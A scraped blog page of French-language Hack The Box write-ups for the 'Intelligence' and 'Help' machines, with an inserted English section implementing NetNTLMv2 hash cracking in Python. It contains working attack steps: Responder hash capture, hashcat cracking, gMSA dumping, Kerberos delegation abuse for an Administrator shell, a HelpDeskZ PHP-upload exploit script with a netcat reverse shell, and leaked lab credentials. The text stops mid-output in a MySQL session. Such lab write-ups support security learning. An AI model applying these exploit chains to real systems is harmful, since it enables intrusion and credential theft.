Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem \u0026#34;AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb\u0026#34; | Where-Object Name -like \u0026#34;web*\u0026#34;) { try { $request = Invoke-WebRequest -Uri \u0026#34;http://$($record.Name)\u0026#34; -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From \u0026#39;Ted Graves \u0026lt;Ted.Graves@intelligence.htb\u0026gt;\u0026#39; -To \u0026#39;Ted Graves \u0026lt;Ted.Graves@intelligence.htb\u0026gt;\u0026#39; -Subject \u0026#34;Host: $($record.Name) is down\u0026#34; } } catch {} } L\u0026rsquo;idée est donc:\nCréer un record DNS commençant par \u0026ldquo;web\u0026rdquo; avec le compte de Tiffany Mettre en place un responder, qui attend de recevoir une requête et nous donnera un hachage Déchiffrer le hachage. New DNS Record On crée un nouveau DNS record : web666. Il pointe vers notre IP. Pour cela on peut utiliser l\u0026rsquo;outil dnstool.py :\n1 2 3 4 5 6 $ dnstool.py -u \u0026#39;intelligence.htb\\Tiffany.Molina\u0026#39; -p \u0026#39;NewIntelligenceCorpUser9876\u0026#39; -r web666 -a add -d 10.10.16.10 10.10.10.248 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully Responder On se met en attente d\u0026rsquo;une requête, avec la commande responder :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [Sep 03, 2025 - 22:43:49 (CEST)] exegol-pentest Intelligence # responder -I tun0 -w -F __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR \u0026amp; MDNS Responder 3.1.5.0 [+] Listening for events... [!] Error starting TCP server on port 53, check permissions or other servers running. 
[HTTP] NTLMv2 Client : 10.10.10.248 [HTTP] NTLMv2 Username : intelligence\\Ted.Graves [HTTP] NTLMv2 Hash : Ted.Graves::intelligence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ed NTLMv2 Hash On effectue une attaque par dictionnaire sur le hachage NTLMv2 de Ted.graves et on obtient les credentials suivants : Ted : Mr.Teddy\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ hashcat -m 5600 ./hash.txt ~/wordlists/rockyou.txt ... TED.GRAVES::intelligence:112.......000:Mr.Teddy Session..........: hashcat Status...........: Cracked Hash.Mode........: 5600 (NetNTLMv2) Hash.Target......: TED.GRAVES::intelligence:1122334455667788:bf2803fdd...000000 Time.Started.....: Wed Sep 3 22:47:36 2025 (2 secs) Time.Estimated...: Wed Sep 3 22:47:38 2025 (0 secs) ... $ nxc smb 10.10.10.248 -u Ted.graves -p \u0026#39;Mr.Teddy\u0026#39; SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False) SMB 10.10.10.248 445 DC [+] intelligence.htb\\Ted.graves:Mr.Teddy Ted.Graves -\u0026gt; svc_int$ ReadGMSAPassword Right on svc_int$ En utilisant bloodhound, on découvre que Ted.Graves fait parti du groupe ITSupport qui a le droit ReadGMSAPassword sur l\u0026rsquo;utilisateur svc_int$.\nEn utilisant la commande gMSADumper.py on peut alors dumper le hachage de svc_int$ :\n1 2 3 4 5 6 7 gMSADumper.py -u \u0026#39;Ted.Graves\u0026#39; -p \u0026#39;Mr.Teddy\u0026#39; -d \u0026#39;intelligence.htb\u0026#39; Users or groups who can read password for svc_int$: \u0026gt; DC$ \u0026gt; itsupport svc_int$:::1dcabcce2cf522bae77d7dc622587879 svc_int$:aes256-cts-hmac-sha1-96:331c8820d64c744ba82a28551b76dc2dc00991df0e253fa613d37c4684e045fd svc_int$:aes128-cts-hmac-sha1-96:40122d8d49ee8c46ea793c19b3a59d08 svc_int$ -\u0026gt; Administrator msDS-AllowedToDelegateTo : WWW/dc.intelligence.htb On remarque que svc_int peut : msDS-AllowedToDelegateTo : WWW/dc.intelligence.htb\nCe qui veut dire que svc_int$ peut se faire passer pour un autre 
utilisateur uniquement vers le service WWW/dc.intelligence.htb. On peut aussi voir ce resultat directement dans bloodhound.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ldapsearch -x -H ldap://10.10.10.248 -D \u0026#34;intelligence\\Ted.Graves\u0026#34; -w \u0026#34;Mr.Teddy\u0026#34; -b \u0026#34;DC=intelligence,DC=htb\u0026#34; | grep -i msDS-AllowedToDel -A20 -B40 # svc_int, Managed Service Accounts, intelligence.htb dn: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user objectClass: computer objectClass: msDS-GroupManagedServiceAccount cn: svc_int distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=h tb .... msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb Silver Ticket : impersonate Administrator On peut maintenant se faire passer pour l\u0026rsquo;administrateur en générant un silver ticket pour le SPN WWW/dc.intelligence.htb.\nOn utilise ensuite psexec pour obtenir un powershell en tant qu\u0026rsquo;admin avec le ticket généré :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 $ getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -dc-ip 10.10.10.248 -hashes :1dcabcce2cf522bae77d7dc622587879 Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache $ mv Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache admin.ccache $ export KRB5CCNAME=\u0026#34;admin.ccache\u0026#34; $ psexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on dc.intelligence.htb..... 
[*] Found writable share ADMIN$ [*] Uploading file RKiuvsgB.exe [*] Opening SVCManager on dc.intelligence.htb..... [*] Creating service MGRO on dc.intelligence.htb..... [*] Starting service MGRO..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.1879] (c) 2018 Microsoft Corporation. All rights reserved. C:\\Windows\\system32\u0026gt; type C:\\Users\\Administrator\\Desktop\\root.txt 8fa6.....9f53 Tips Parfois bloodhound n\u0026rsquo;affiche pas toutes les informations. Par exemple, je ne voyais pas la route de Ted vers svc_int.\nEn effet, j\u0026rsquo;ai l\u0026rsquo;habitude de cliquer sur Outbound Object Control-\u0026gt; Transitive Object Control.\nMais il fallait faire :\nOutbound Object Control -\u0026gt; Group Delegated Object Control Attention donc à bien regarder toutes les possibilités de Outbound Object Control sur un utilisateur owned.\nAllowed To Delegate : WWW/dc.intelligence.htb Il faut regarder chaque parametre de l\u0026rsquo;utilisateur sur bloodhound. J\u0026rsquo;aurais dû reperer cela. Tout ne saute pas forcement aux yeux.\npsexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb Pour psexec, attention ici j\u0026rsquo;ai du préciciser Administrator@dc.intelligence.htb au lieu de l\u0026rsquo;ip que j\u0026rsquo;avais mis initialement : Administrator@10.10.10.248. 
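The Responder line captured above is a NetNTLMv2 challenge-response, not a password hash: hashcat -m 5600 recomputes the response from each candidate password and compares. The following added example (not part of the writeup) implements that computation in plain Python so the format of the line and the cryptography behind the cracking step are explicit. Every input is constructed: Responder's default server challenge 1122334455667788 (the one visible in the hashcat target above), a minimal client blob, the user, domain and password from this box, and a three-word stand-in for rockyou.txt; the sample line is generated by the script itself. MD4 is implemented inline because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
"""Offline verification of a NetNTLMv2 capture in hashcat -m 5600 format.

Added example, not the writeup's code. All inputs below are constructed.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') is often disabled under OpenSSL 3."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)            # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):                             # round 1
            a, b, c, d = d, _rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                             # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                             # round 3
            k = (0, 8, 4, 12)[i % 4] + (0, 2, 1, 3)[i // 4]
            a, b, c, d = d, _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def ntlm_hash(password: str) -> bytes:
    """NT hash: MD4 over the UTF-16LE password (what hashcat -m 1000 cracks)."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain in UTF-16LE."""
    return hmac.new(ntlm_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 keyed with NTOWFv2 over server challenge + client blob."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def format_5600(password, user, domain, server_challenge, blob) -> str:
    """Build the USER::DOMAIN:challenge:NTProofStr:blob line Responder prints and hashcat reads."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_5600(line: str, wordlist):
    """Return the first candidate whose recomputed NTProofStr matches the line, else None."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    chal, proof, blob = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


SERVER_CHALLENGE = bytes.fromhex("1122334455667788")   # Responder's fixed default challenge
# Constructed NTLMv2 blob: RespType/HiRespType, reserved, FILETIME, client challenge,
# reserved, AV pairs (only MsvAvEOL here), reserved.
BLOB = (bytes.fromhex("01010000") + b"\x00" * 4 + struct.pack("<Q", 133_000_000_000_000_000)
        + bytes.fromhex("a1b2c3d4e5f60718") + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4)
SAMPLE_LINE = format_5600("Mr.Teddy", "Ted.Graves", "intelligence", SERVER_CHALLENGE, BLOB)
WORDLIST = ["password", "Welcome1", "Mr.Teddy"]         # stand-in for rockyou.txt

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_5600(SAMPLE_LINE, WORDLIST))
```

In a real capture the blob carries the client's timestamp and the AV pairs naming the target, so a response is only ever valid for that one exchange: it cannot be reused as a credential, but, as the hashcat run above shows, it can be cracked offline at MD4-plus-two-HMAC-MD5 cost per candidate.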
Il faut bien sûr que **dc.intelligence.htb **soit bien dans le /etc/hosts.\n","date":"2025-09-03T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/intelligence-htb/","title":"HTB | Intelligence"},{"content":" Machine name OS IP Difficulty Editor Linux 10.10.11.80 Easy Soon :)\n","date":"2025-08-28T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/editor-htb/","title":"HTB | Editor"},{"content":" Machine name OS IP Difficulty Help Linux 10.10.10.121 Easy System Info 1 2 3 4 Distributor ID:\tUbuntu Description:\tUbuntu 16.04.5 LTS Release:\t16.04 Codename:\txenial Users 1 2 3 4 ## Graphql helpme@helpme.com : godhelpmeplz ## PAM / SSH help : Welcome1 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.121 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e5bb4d9cdeaf6bbfba8c227ad8d74328 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZY4jlvWqpdi8bJPUnSkjWmz92KRwr2G6xCttorHM8Rq2eCEAe1ALqpgU44L3potYUZvaJuEIsBVUSPlsKv+ds8nS7Mva9e9ztlad/fzBlyBpkiYxty+peoIzn4lUNSadPLtYH6khzN2PwEJYtM/b6BLlAAY5mDsSF0Cz3wsPbnu87fNdd7WO0PKsqRtHpokjkJ22uYJoDSAM06D7uBuegMK/sWTVtrsDakb1Tb6H8+D0y6ZQoE7XyHSqD0OABV3ON39GzLBOnob4Gq8aegKBMa3hT/Xx9Iac6t5neiIABnG4UP03gm207oGIFHvlElGUR809Q9qCJ0nZsup4bNqa/ | 256 d5b010507486a39fc5536f3b4a246119 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHINVMyTivG0LmhaVZxiIESQuWxvN2jt87kYiuPY2jyaPBD4DEt8e/1kN/4GMWj1b3FE7e8nxCL4PF/lR9XjEis= | 256 e21b88d37621d41e38154a8111b79907 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHxDPln3rCQj04xFAKyecXJaANrW3MBZJmbhtL4SuDYX 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 |_http-title: Did not follow redirect to http://help.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) 3000/tcp open http syn-ack ttl 63 Node.js Express framework |_http-title: 
Site doesn\u0026#39;t have a title (application/json; charset=utf-8). | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS Foothold Graphql : Getting creds using the API On découvre une API graphql sur le port 3000 à l\u0026rsquo;aide dirsearch. A l\u0026rsquo;aide de ChatGPT, on comprend comment effectuer des requêtes afin de comprendre la structure des données disponibles et de récupérer des informations.\nOn trouve finalement un user/password après quelques requetes :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 $ dirsearch -u http://10.10.10.121:3000/ _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://10.10.10.121:3000/ [00:50:04] Scanning: [00:50:13] 400 - 18B - /graphql [00:50:13] 400 - 18B - /graphql/ [00:50:13] 400 - 18B - /graphql/console [00:50:13] 400 - 18B - /graphql/schema.yaml [00:50:13] 400 - 18B - /graphql/graphql [00:50:13] 400 - 18B - /graphql/schema.json [00:50:13] 400 - 18B - /graphql/schema.xml Task Completed $ curl -X POST http://10.10.10.121:3000/graphql \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;query\u0026#34;:\u0026#34;{ __typename }\u0026#34;}\u0026#39; {\u0026#34;data\u0026#34;:{\u0026#34;__typename\u0026#34;:\u0026#34;Query\u0026#34;}} $ curl -X POST http://10.10.10.121:3000/graphql \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;query\u0026#34;:\u0026#34;{ __schema { types { name fields { name } } } }\u0026#34;}\u0026#39; 
{\u0026#34;data\u0026#34;:{\u0026#34;__schema\u0026#34;:{\u0026#34;types\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;Query\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;user\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;User\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;username\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;password\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;String\u0026#34;,\u0026#34;fields\u0026#34;:null},{\u0026#34;name\u0026#34;:\u0026#34;__Schema\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;types\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;queryType\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;mutationType\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;subscriptionType\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;directives\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__Type\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;kind\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;name\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;description\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;fields\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;interfaces\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;possibleTypes\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;enumValues\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;inputFields\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;ofType\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__TypeKind\u0026#34;,\u0026#34;fields\u0026#34;:null},{\u0026#34;name\u0026#34;:\u0026#34;Boolean\u0026#34;,\u0026#34;fields\u0026#34;:null},{\u0026#34;name\u0026#34;:\u0026#34;__Field\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;name\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;description\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;args\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;type\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;isDeprecated\u0026#34;},{\
u0026#34;name\u0026#34;:\u0026#34;deprecationReason\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__InputValue\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;name\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;description\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;type\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;defaultValue\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__EnumValue\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;name\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;description\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;isDeprecated\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;deprecationReason\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__Directive\u0026#34;,\u0026#34;fields\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;name\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;description\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;locations\u0026#34;},{\u0026#34;name\u0026#34;:\u0026#34;args\u0026#34;}]},{\u0026#34;name\u0026#34;:\u0026#34;__DirectiveLocation\u0026#34;,\u0026#34;fields\u0026#34;:null}]}}} $ curl -X POST http://10.10.10.121:3000/graphql \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;query\u0026#34;:\u0026#34;{ user { username password } }\u0026#34;}\u0026#39; {\u0026#34;data\u0026#34;:{\u0026#34;user\u0026#34;:{\u0026#34;username\u0026#34;:\u0026#34;helpme@helpme.com\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;5d3c93182bb20f07b994a7f617e99cff\u0026#34;}}} Avec hashcat, on reussi à récupérer le mot de passe suivant : godhelpmeplz\n1 2 hashcat -m 0 ./hash.txt ~/wordlists/rockyou.txt --show 5d3c93182bb20f07b994a7f617e99cff:godhelpmeplz Helpdeskz - version 1.0.2 On remarque Helpdeskz est installé avec une version vulnérable (potentiellment 2 CVE).\n1 2 3 4 5 6 7 8 9 10 11 12 http://help.htb/support/UPGRADING.txt -------------- Welcome to HelpDeskZ 1.0.2 ========================== We have made some changes in this new 
version like: - SEO-friendly URLs compatibility fixed - Login with Facebook account (Facebook connect) - Login with Google account (Google OAuth) File Upload : PHP reverse shell On trouve un premier exploit qui ne fonctionne pas, il s\u0026rsquo;agit d\u0026rsquo;un file upload permettant d\u0026rsquo;executer du code php. En realité la machine est bien exploitable, mais l\u0026rsquo;exploit ne fonctionne pas à cause d\u0026rsquo;un problème d\u0026rsquo;horaire. La machine n\u0026rsquo;est pas à la meme heure que la notre, et l\u0026rsquo;exploit est basé, en autre, sur l\u0026rsquo;heure. Il a donc fallu rajotuer dans l\u0026rsquo;exploit ceci:\n1 2 3 4 5 6 ##Getting the Time from the server response = requests.head(\u0026#39;http://10.10.10.121/support/\u0026#39;) serverTime = response.headers[\u0026#39;Date\u0026#39;] ##setting the time in Epoch FormatTime = \u0026#39;%a, %d %b %Y %H:%M:%S %Z\u0026#39; currentTime = int(calendar.timegm(time.strptime(serverTime, FormatTime))) Cela permet de recuperer l\u0026rsquo;heure exacte défini sur Helpdeskz, c\u0026rsquo;est important pour la suite de l\u0026rsquo;exploitation. En cherchant un peu sur github, on trouve justement l\u0026rsquo;exploit original avec ces quelques lignes de code supplémentaire (je n\u0026rsquo;ai pas eu besoin de rajouter ce code moi même mais c\u0026rsquo;était faisable.).\nVoici le fichier d\u0026rsquo;exploitation en Python permettant d\u0026rsquo;executer le fichier téléchargé sur la machine. Dans un premier temps il a fallu creer un ticket et ajouter une piece jointe avec un fichier php (reverse shell). 
Il faut, seulement ensuite, executer le code python qui doit retrouver le fichier php et l\u0026rsquo;executer.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 ##!/bin/python ##This is a modified version of https://www.exploit-db.com/raw/40300 ##Since the sysntax on time calculation is incorect \u0026#39;\u0026#39;\u0026#39; The default configuration of this software allows for php files to be uploaded Steps to reproduce Fill out a ticket form and attach a php file, solve the captcha and upload, (the application will display \u0026#39;File is not allowed\u0026#39; but the file is still uploaded!! Set up a netcat session to catch the reverse shell Run this script and receive a reverse shell back!!! \u0026#39;\u0026#39;\u0026#39; import hashlib import time, calendar import sys import requests print \u0026#39;HelpDesk v1.0.2 - Unauthenticated shell upload\u0026#39; if len(sys.argv) \u0026lt; 3: print \u0026#34;Usage: {} http://helpdeskz.com/support/uploads/tickets/ Reverse-shell.php\u0026#34;.format(sys.argv[0]) sys.exit(1) helpdeskzBaseUrl = sys.argv[1] fileName = sys.argv[2] ##Getting the Time from the server response = requests.head(\u0026#39;http://10.10.10.121/support/\u0026#39;) serverTime = response.headers[\u0026#39;Date\u0026#39;] ##setting the time in Epoch FormatTime = \u0026#39;%a, %d %b %Y %H:%M:%S %Z\u0026#39; currentTime = int(calendar.timegm(time.strptime(serverTime, FormatTime))) for x in range(0,300): plaintext = fileName + str(currentTime -x) md5hash = hashlib.md5(plaintext).hexdigest() url = helpdeskzBaseUrl + md5hash + \u0026#39;.php\u0026#39; response = requests.head(url) if response.status_code == 200: print(\u0026#34;found!\u0026#34;) print(url) sys.exit(0) print(\u0026#34;Sorry, I did not find anything\u0026#34;) On voit ici l\u0026rsquo;obtention d\u0026rsquo;un reverse shell :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 
27 28 29 30 31 32 33 34 35 36 37 38 39 $ nc -lnvp 9001 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.121. Ncat: Connection from 10.10.10.121:34876. SOCKET: Shell has connected! PID: 1312 whoami help python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; help@help:/var/www/html/support/uploads/tickets$ export TERM=xterm export TERM=xterm help@help:/var/www/html/support/uploads/tickets$ ^Z [1] + 3405 suspended nc -lnvp 9001 [Aug 26, 2025 - 00:39:46 (CEST)] exegol-pentest /workspace # stty raw -echo;fg [1] + 3405 continued nc -lnvp 9001 help@help:/var/www/html/support/uploads/tickets$ help@help:/var/www/html/support/uploads/tickets$ ls 072358eef300beb18834f16ffb121aee.php 5d13aeec839047b1647d58538fd788b8.png 1041ae9bd805fcd792d6a1e775ca8fab.txt c89564cd603a96bafcd9e53210d6042b.txt 11768880feca2125903635561dd4d047.php fd517142e88d1dfb1c8616b7f8824891.txt 1c9c8783677b6498d5e2453241c6c3b9.php index.php 316c27c726d57e961f236992c9788715.php help@help:/var/www/html/support/uploads/tickets$ cd /home/ help@help:/home$ ls help help@help:/home$ cd help/ help@help:/home/help$ ls help npm-debug.log user.txt -------------\u0026gt; help@help:/home/help$ cat user.txt b800.....6650 ---------------------------------------------------------------- python2 final2.py http://help.htb/support/uploads/tickets/ s2.php HelpDesk v1.0.2 - Unauthenticated shell upload 1756161392 On obtient finalement un shell en tant que l\u0026rsquo;utilisateur help.\nSecond File Upload / SQL Injection CVE Une deuxième exploitation était possible. Il fallait se connecter avec les credentials trouvés dans graphql sur la plateforme Helpdeskz et poster un ticket avec une pièce-jointe. 
Il était alors possible ensuite de faire des requêtes vers cette pièce jointe en faisant une injection SQL dans l\u0026rsquo;url.\nEn sauvegardant la requête à l\u0026rsquo;aide Burp, puis en utilisant sqlmap, il n\u0026rsquo;est pas trop dur de l\u0026rsquo;exploiter. J\u0026rsquo;ai tenté d\u0026rsquo;utiliser une exploit déjà écrite, mais ça n\u0026rsquo;a pas fonctionné. A la fin, vous pouvez voir comment l\u0026rsquo;exploiter dans la section Bonus.\nmysql : staff table En cherchant dans les fichiers de site web, on trouve un dossier includes avec un fichier config.php contenant les credentials pour se connecter à une base de donnée SQL. En cherchant dans la base de données on découvre une base de donnée support avec une table staff contenant un user \u0026ldquo;admin\u0026rdquo; et un hachage :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 help@help:/var/www$ cd html help@help:/var/www/html$ ls index.html support help@help:/var/www/html$ cd support help@help:/var/www/html/support$ ls LICENSE.txt captcha.php facebookOAuth images js views README.md controllers favicon.ico includes readme.html UPGRADING.txt css googleOAuth index.php uploads help@help:/var/www/html/support$ cd includes/ help@help:/var/www/html/support/includes$ ls PHPMailer classes helpdesk.inc.php pipe.php Twig config.php index.php staff.inc.php bootstrap.php functions.php language support.sql captcha.ttf global.php parser timezone.inc.php help@help:/var/www/html/support/includes$ cat config.php \u0026lt;?php $config[\u0026#39;Database\u0026#39;][\u0026#39;dbname\u0026#39;] = \u0026#39;support\u0026#39;; $config[\u0026#39;Database\u0026#39;][\u0026#39;tableprefix\u0026#39;] = \u0026#39;\u0026#39;; $config[\u0026#39;Database\u0026#39;][\u0026#39;servername\u0026#39;] = \u0026#39;localhost\u0026#39;; $config[\u0026#39;Database\u0026#39;][\u0026#39;username\u0026#39;] = \u0026#39;root\u0026#39;; $config[\u0026#39;Database\u0026#39;][\u0026#39;password\u0026#39;] = 
\u0026#39;helpme\u0026#39;; $config[\u0026#39;Database\u0026#39;][\u0026#39;type\u0026#39;] = \u0026#39;mysqli\u0026#39;; ?\u0026gt; Connexion à la base de donnée mysql en utilisant les credentials trouvés précédemment :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 help@help:/var/www/html/support/includes$ mysql -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \\g. Your MySQL connection id is 785 Server version: 5.7.24-0ubuntu0.16.04.1 (Ubuntu) Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type \u0026#39;help;\u0026#39; or \u0026#39;\\h\u0026#39; for help. Type \u0026#39;\\c\u0026#39; to clear the current input statement. mysql\u0026gt; .tables -\u0026gt; ; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026#39;.tables\u0026#39; at line 1 mysql\u0026gt; show tables; ERROR 1046 (3D000): No database selected mysql\u0026gt; show db; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026#39;db\u0026#39; at line 1 mysql\u0026gt; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | support | | sys | +--------------------+ 5 rows in set (0.02 sec) mysql\u0026gt; use support Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql\u0026gt; show tables -\u0026gt; ; +--+ | Tables_in_support | +--+ | articles | | attachments | | 
